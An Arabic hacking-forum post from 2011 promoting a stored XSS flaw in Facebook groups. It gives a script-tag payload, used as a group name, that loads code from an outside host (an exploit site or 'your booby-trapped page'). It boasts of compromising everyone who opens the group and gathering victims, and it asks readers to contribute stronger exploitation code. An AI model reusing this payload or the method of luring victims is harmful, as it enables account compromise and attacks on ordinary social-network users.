ثغرة ( Facebook XSS Vulnerability ) و شرحها

MR.X-hacker-maroc · 03-12-2011, 12:25 AM

و اولا هذا شرح لاى ثغرة باسم XSS و هذا للناس المش عارفين ما هيا ثغرات XSS

( http://ar.wikipedia.org/wiki/%D8%A8%...A7%D9%82%D8%B9 )
موضوع النهاردة مميز جدااا و ثغرة لسا طازة , و تاريخ نزولها ( 2010-04-02 ) يعنى جديدة شوية

المهم الثغرة عبارة عن تخترق اى حد من فيس بوك بمجرد دخول على جروب الانتا عملوا يعنى ممكن من هذة الثغرة

تخترق هكر محترف لو ضغط على الجروب يعنى حاجة مميزة جدااا جدااا شوفوا الثغرة عبارة عن ( Facebook XSS Vulnerability )

و ثغرة عبارة عن فكرة حلوا و هيا حسب الفهمتوا من شرح الموجود فى ثغرة

ان انا بعمل جروب باسم جافا سكربت ( يعنى مثلا : كود:
<****** src=http://inj3ct0r.com></******>
)

و هذة صور توضيح للفكرة : -

طب اية الفكرة بكل اختصار انا فهمت ان فيس بوك يستخدم سكربت كثيرة يعنى ممكن ان تعمل اى امر تطبيق للجافا

حتا لو امر ينفذ باتش او سيرفر يعنى شوف مدى الخطورة , لا و اية كمان ممكن تنشر جروب و تجمع ضحايا كلهم من فيس بوك ..

هذة الثغرة

http://inj3ct0r.com/exploits/11577

و على فكرة لو حد عايز يفهم الثغرة لوحدة علشان يتاكد من كلمى >ابد قراءة من هنا ( :::::::::: How to exploit this )

و طبعا بعد هذا ارجوا ان ثغرة تنال اعجبكم

بس انا عايز من المختصين فى ( HTML or Java Script code ) ان ينزلوا كود لهذة ثغرة او احسن استغلال لهذة كود ..

ياريت حد يضع كود مميز ,و يجربوا قبل ما يضع الكود هذا امنية ...

و انا هساهم باول كود الموجود فى ثغرة ( كود:
<****** src=رابط صفختك الملغومة></******>
) ...

و فى نصيحة لاعضاء ديف بوينت المميز ( هيا : احسن و اكبر موقع ثغرات هوا هذا http://inj3ct0r.com

:yipi: